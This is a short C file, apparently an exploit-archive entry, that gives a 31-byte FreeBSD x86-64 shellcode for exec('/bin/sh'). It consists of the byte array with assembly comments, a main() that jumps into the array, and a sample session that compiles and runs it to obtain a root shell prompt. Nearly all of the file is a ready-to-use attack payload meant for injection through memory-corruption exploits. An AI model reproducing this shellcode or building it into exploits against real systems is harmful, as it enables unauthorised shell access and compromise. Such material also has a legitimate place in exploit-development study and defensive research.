/** * * _ _ _ ____ _ _ * | | | | __ _ ___| | ___ __ | _ \ ___ | | | * | |_| |/ _` |/ __| |/ / '_ \ | |_) / _ \| | | * | _ | (_| | (__| <| | | | | _ < (_) | | | * |_| |_|\__,_|\___|_|\_\_| |_| |_| \_\___/|_|_| * [ http://www.hacknroll.com ] * * Description: * FreeBSD x86-64 exec("/bin/sh") Shellcode - 31 bytes * * * * Authors: * Maycon M. Vitali ( 0ut0fBound ) * Milw0rm .: http://www.milw0rm.com/author/869 * Page ....: http://maycon.hacknroll.com * Email ...: maycon@hacknroll.com * * Anderson Eduardo ( c0d3_z3r0 ) * Milw0rm .: http://www.milw0rm.com/author/1570 * Page ....: http://anderson.hacknroll.com * Email ...: anderson@hacknroll.com * * ------------------------------------------------------- * * amd64# gcc hacknroll.c -o hacknroll * amd64# ./hacknroll * # exit * amd64# * * ------------------------------------------------------- */ const char shellcode[] = "\x48\x31\xc0" // xor %rax,%rax "\x99" // cltd "\xb0\x3b" // mov $0x3b,%al "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622fff,%rdi "\x48\xc1\xef\x08" // shr $0x8,%rdi "\x57" // push %rdi "\x48\x89\xe7" // mov %rsp,%rdi "\x57" // push %rdi "\x52" // push %rdx "\x48\x89\xe6" // mov %rsp,%rsi "\x0f\x05"; // syscall int main(void) { (*(void (*)()) shellcode)(); return 0; }